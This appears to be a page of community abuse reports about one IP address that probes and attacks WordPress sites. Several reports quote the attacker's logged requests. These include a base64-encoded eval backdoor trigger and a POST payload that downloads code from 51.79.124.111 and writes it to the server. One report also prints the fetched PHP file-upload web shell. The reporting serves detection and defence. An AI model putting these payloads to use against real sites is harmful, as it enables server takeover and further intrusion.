www.unitiz.com
2023-06-04 21:17:53
(1 year ago)
Probing non-existent URLs
Bad Web Bot
Web App Attack
www.unitiz.com
2023-05-31 12:15:19
(1 year ago)
Probing non-existent URLs
Bad Web Bot
Web App Attack
BackstromM
2023-05-08 20:55:12
(1 year ago)
Malicious File Upload probing / vulnerability probing / site scan
Hacking
Brute-Force
Bad Web Bot
Web App Attack
PT
2023-05-08 08:47:25
(1 year ago)
GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==
GET ... show more GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==
GET /style.php?sig=update&domain=51.79.124.111/vz.txt show less
Brute-Force
Web App Attack
Anonymous
2023-05-08 07:20:51
(1 year ago)
WEB_SERVER 403 Forbidden
Hacking
NotACaptcha
2023-05-08 06:49:23
(1 year ago)
webserver:443 [08/May/2023] "GET /style.php?sig=update&domain=51.79.124.111/vz.txt HTTP/1.1" 404 57 ... show more webserver:443 [08/May/2023] "GET /style.php?sig=update&domain=51.79.124.111/vz.txt HTTP/1.1" 404 5728 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
webserver:80 [08/May/2023] "GET /style.php?sig=update&domain=51.79.124.111/vz.txt HTTP/1.1" 302 551 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
webserver:443 [08/May/2023] "GET /style.php?sig=update&domain=51.79.124.111/vz.txt HTTP/1.1" 404 5802 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
webserver:80 [08/May/2023] "GET /style.php?sig=update&domain=51.79.124.111/vz.txt HTTP/1.1" 302 561 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv... show less
Web App Attack
silisoftware.com
2023-05-08 05:57:59
(1 year ago)
/wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==
Web App Attack
Hirte
2023-05-08 05:38:24
(1 year ago)
MYH: Web Attack POST //wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J1 ... show more MYH: Web Attack POST //wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw== show less
Web Spam
Hacking
Bad Web Bot
Web App Attack
ereznet.co.il
2023-05-08 05:30:17
(1 year ago)
HACK
Brute-Force
URAN Publishing Service
2023-05-08 05:17:29
(1 year ago)
198.167.198.216 - - [08/May/2023:08:17:28 +0300] "GET /wp-content/uploads/ HTTP/1.1" 404 276 "-" "Mo ... show more 198.167.198.216 - - [08/May/2023:08:17:28 +0300] "GET /wp-content/uploads/ HTTP/1.1" 404 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
... show less
Web App Attack
Ba-Yu
2023-05-08 04:33:56
(1 year ago)
General hacking/exploits/scanning
Web Spam
Hacking
Brute-Force
Exploited Host
Web App Attack
octageeks.com
2023-05-08 04:06:08
(1 year ago)
Wordpress malicious attack:[octablocked]
Web App Attack
Anonymous
2023-05-08 03:56:06
(1 year ago)
[Drupal AbuseIPDB module] Request path is blacklisted. /wp-admin/css/colors/blue/blue.php
Web App Attack
Anonymous
2023-05-08 03:28:22
(1 year ago)
POST = Array
(
[vz] => $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/ ... show more POST = Array
(
[vz] => $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo "aDriv4".$x;
)
[REQUEST_URI] => //wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==
Analysis:
base64_decode of $_GET["wall"] = echo aDriv4;eval($_POST['vz']);
Remote URL contents:
aDriv4-Priv8 TOOL<?php echo '<pre>'.php_uname()."\n".'<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'OK';}else{echo 'ER';}}?> show less
Hacking
Web App Attack
www.unitiz.com
2023-05-08 02:12:40
(1 year ago)
Probing non-existent URLs
Bad Web Bot
Web App Attack